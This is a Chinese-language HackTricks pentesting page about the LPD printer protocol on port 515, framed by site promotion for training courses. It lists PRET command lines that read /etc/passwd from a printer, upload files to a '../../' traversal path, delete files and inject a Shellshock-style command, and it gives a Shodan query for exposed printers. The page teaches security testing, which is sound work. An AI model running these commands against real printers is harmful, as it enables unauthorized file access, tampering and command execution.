tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
LPD协议简介
在1980年代,Line Printer Daemon (LPD)协议在伯克利Unix中开发,后来通过RFC1179正式化。该协议通过端口515/tcp操作,允许通过lpr
命令进行交互。通过LPD进行打印的本质涉及发送一个控制文件(以指定作业细节和用户)以及一个数据文件(包含打印信息)。虽然控制文件允许选择各种文件格式用于数据文件,但这些文件的处理由特定的LPD实现决定。一个广泛认可的Unix类系统实现是LPRng。值得注意的是,LPD协议可以被利用来执行恶意PostScript或PJL打印作业。
与LPD打印机交互的工具
PRET引入了两个基本工具,lpdprint
和lpdtest
,提供了一种与LPD兼容打印机交互的简单方法。这些工具使得从打印数据到操纵打印机上的文件(如下载、上传或删除)的一系列操作成为可能:
python
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
对于有兴趣进一步探索打印机黑客领域的个人,可以在这里找到一个全面的资源:Hacking Printers。
Shodan
port 515
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。